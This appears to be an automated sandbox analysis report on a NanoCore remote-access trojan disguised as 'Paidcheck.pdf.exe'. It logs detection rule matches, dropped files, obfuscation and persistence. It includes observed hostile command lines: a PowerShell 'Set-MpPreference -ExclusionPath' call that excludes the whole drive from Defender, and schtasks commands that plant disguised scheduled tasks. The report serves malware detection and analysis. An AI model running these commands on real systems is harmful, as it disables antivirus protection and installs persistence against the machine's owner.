      Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.486430040.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Paidcheck.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: explorerr.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: classification engineClassification label: mal100.troj.evad.winEXE@20/24@0/1
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrnJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:484:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{bcd083ef-bf90-4541-bf76-579f377e7cee}
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_01
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbsJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
      Source: Paidcheck.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile read: C:\Users\user\Desktop\Paidcheck.pdf.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Paidcheck.pdf.exe 'C:\Users\user\Desktop\Paidcheck.pdf.exe'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe 0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' Jump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'Jump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Paidcheck.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: Paidcheck.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Paidcheck.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: RegAsm.pdb source: dhcpmon.exe, RegAsm.exe.0.dr
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp, RegAsm.exe, 00000011.00000002.325398042.0000000000CA2000.00000002.00020000.sdmp, dhcpmon.exe, 00000013.00000000.322931989.00000000002A2000.00000002.00020000.sdmp, dhcpmon.exe, 00000015.00000000.334603613.00000000008A2000.00000002.00020000.sdmp, RegAsm.exe.0.dr
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp

      Data Obfuscation:

      barindex
      .NET source code contains potential unpackerShow sources
      Source: Paidcheck.pdf.exe, AddressBook.cs.Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: explorerr.exe.0.dr, AddressBook.cs.Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 0.0.Paidcheck.pdf.exe.6a0000.0.unpack, AddressBook.cs.Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 0.2.Paidcheck.pdf.exe.6a0000.0.unpack, AddressBook.cs.Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: Paidcheck.pdf.exeStatic PE information: 0xC8D6E03A [Sat Oct 10 03:15:06 2076 UTC]
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3795 push es; ret 0_2_06FF3798
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3791 push es; ret 0_2_06FF3794
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3785 push es; ret 0_2_06FF3790
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3775 push es; ret 0_2_06FF3784
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3771 push es; ret 0_2_06FF3774
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF375D push es; ret 0_2_06FF3770
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3735 push es; ret 0_2_06FF3754
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3735 push es; ret 0_2_06FF3770
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF3731 push es; ret 0_2_06FF3734
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF372D push es; ret 0_2_06FF3730
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF6594 push E9072621h; retf 0_2_06FF6599
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF2A70 push es; iretd 0_2_06FF2A72
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF2A35 push es; iretd 0_2_06FF2A36
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF1A22 push ss; iretd 0_2_06FF1A23
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF1A10 push ss; iretd 0_2_06FF1A17
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF29CE push es; iretd 0_2_06FF29CF
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_07B2313F push cs; iretd 0_2_07B2314F
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_07B23D3C push ds; ret 0_2_07B23D3F
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_07B23D05 push eax; ret 0_2_07B23D0D
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_007644A3 push es; retf 10_2_007644A4
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_00764469 push cs; retf 10_2_0076449E
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_00764289 push es; retf 10_2_00764294
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509ACFA push E801005Eh; retf 10_2_0509AD01
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509B114 push 8BC04589h; retf 10_2_0509B125
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509B161 push 8BBC4589h; retf 10_2_0509B16D
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509B1A8 push 8BB84589h; retf 10_2_0509B1B5
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509B1F1 push 8BB44589h; retf 10_2_0509B1FD
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509B235 push 8BB04589h; retf 10_2_0509B242
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00CA4289 push es; retf 17_2_00CA4294
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00CA4469 push cs; retf 17_2_00CA449E
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00CA44A3 push es; retf 17_2_00CA44A4
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exeJump to dropped file
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

      Boot Survival:

      barindex
      Creates an undocumented autostart registry key Show sources
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrnJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exeJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe\:Zone.Identifier:$DATAJump to behavior

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Uses an obfuscated file name to hide its real file extension (double extension)Show sources
      Source: Possible double extension: pdf.exeStatic PE information: Paidcheck.pdf.exe
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
